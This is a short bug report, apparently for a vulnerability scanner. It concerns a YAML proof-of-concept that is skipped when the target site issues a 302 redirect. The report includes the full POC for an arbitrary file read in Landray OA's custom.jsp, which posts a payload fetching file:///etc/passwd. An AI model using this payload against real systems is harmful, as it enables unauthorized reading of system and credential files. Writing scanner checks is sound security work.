I found the following problem while writing a POC:
```yaml
params: []
name: 蓝凌OA custom.jsp-任意文件读取
set: {}
rules:
  - path: /sys/ui/extend/varkind/custom.jsp
    headers: {}
    body: var={"body":{"file":"file:///etc/passwd"}}
    search: ""
    followredirects: false
    expression: response.status == 200 && response.body.bcontains(b"root")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""
```
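The following case loads normally:
The site has no 302 redirect; the captured traffic shows that the POC was loaded successfully and one POST request was sent.
Switching to another site that has a 302 redirect, the traffic in Burp shows that the POC was not loaded for detection.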